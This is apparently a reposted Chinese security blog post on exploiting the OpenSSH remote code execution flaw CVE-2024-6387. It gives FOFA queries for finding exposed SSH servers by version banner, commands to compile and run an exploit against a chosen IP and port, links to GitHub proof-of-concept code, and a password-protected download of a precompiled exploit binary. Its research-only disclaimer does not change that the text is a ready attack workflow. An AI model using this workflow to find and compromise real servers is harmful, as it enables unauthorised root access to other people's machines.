nmap 127.0.0.1 -Pn 22 -sV
fofa语法
protocol="ssh"
技巧:根据banner信息查找特定shh版本
protocol="ssh" && banner="8.6"
漏洞复现
目前的poc需要大量的时间才能rce,需要不断的去尝试,而且成功率只有一半所以耗时比较久。
gcc -o exploit 7etsuo-regreSSHion.c
./exploit <ip> <port>
例如:
./exploit 127.0.0.1 22
poc
github(需自行编译)
https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc
编译好的文件(使用ubuntu进行编辑)
下载:https://wwd.lanzouj.com/iwZS323ae9rg 密码:5c26
原文始发于微信公众号(鹏组安全):OpenSSH RCE (CVE-2024-6387) | 附poc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论